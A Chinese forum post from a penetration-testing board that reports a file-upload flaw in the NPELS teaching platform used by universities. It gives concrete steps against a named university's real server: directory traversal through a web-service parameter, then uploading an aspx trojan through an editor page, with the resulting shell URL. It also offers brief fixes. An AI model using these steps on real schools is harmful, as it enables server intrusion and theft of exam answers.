找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 新理念外语网络教学平台文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2471|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
* @" e6 x7 C7 U0 |) l
! q5 c, ?: {" ?0 ~" z详细说明:8 y3 @  |+ s$ _8 M1 _; q: J
6 }7 G# L! x3 P2 c1 o0 u
以南开大学的为例: * f9 F' n2 Z+ C: A
http://222.30.60.3/NPELS
; O; h4 C7 `/ R1 C! ]( vNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址1 s4 i, J# g' }  s. ^
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
$ q, R0 _: p$ l7 P6 g<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
2 X: `$ J' h' I, z</setting>6 }3 k1 J4 J- [) M. y
及版本号
4 `7 e8 m1 e6 u) s1 b<add key="TVersion" value="1, 0, 0, 2187">
$ h1 `' t. s, q! q+ P8 R3 I</add>7 ^3 X& g) @. y3 r+ a
直接访问2 n6 p, w; w+ G9 j; s$ j0 |5 ]
http://222.30.60.3/NPELS/CommonService.asmx
8 v/ o% f( i) k, O: H6 U1 e: {使用GetTestClientFileList操作,直接 HTTP GET 列目录:  P3 [1 A5 G% p/ U) F5 X( s2 c* f) O
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187+ D) L- z; `" b* j$ a) m
进一步列目录(返回的网页很大,可以直接 wget 下来)6 b2 x" u, R6 K# S) D1 d- X
http://222.30.60.3/NPELS/CommonS ... List?version=../../8 U" i- K5 E6 E# ]$ M
; L2 D9 T( U- c$ K8 \) \5 F9 c2 O  m
发现
6 B- y5 A+ l6 Ghttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
  I! p; b- M5 M$ V* d) l( _可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头3 F& F; f6 @5 i* R" [6 ?
上传后继续列目录找到木马地址直接访问即可% I( p& b4 Y+ l& \# z
3 b( [7 b" p8 R
OOXX  i, f  h" K; I) A" i
0 W6 q; |& @3 a6 P; d- G" s
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法2 t8 ^/ q% h3 e1 E6 q
漏洞证明:5 K# Y" E3 _! Q
& k4 k6 u; @& V2 W, g9 z
列目录:8 i9 r0 G& I( t" E! ]; t% D
http://222.30.60.3/NPELS/CommonS ... List?version=../../, Y6 V5 ^+ v" P/ X' l( y( `! p
文件上传:, ^# U+ N! c8 l- B4 ~( J$ H% E% w
http://222.30.60.3/npelsv/editor/editor.htm4 k+ q' M' g8 h5 o( ~) x

; E! @. g+ t6 ^9 h4 F1 U' y上传木马:; g: r8 K: K* ]
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
# P6 J% d, w! a; i! X: s; ~
2 ]( D% y8 V. `/ T9 g2 K# I" f修复方案:6 b5 ?* T1 b. ^1 p$ e1 Q7 P/ o
好像考试系统必须使用 CommonService.asmx+ N2 W! T3 e2 L9 i, m' f# Z, \
最好配置文件加密或者用别的方式不让它泄露出来% l: V+ {7 C/ h" k% h3 H
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
! Q' @7 ^  w/ d: \9 [" I
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表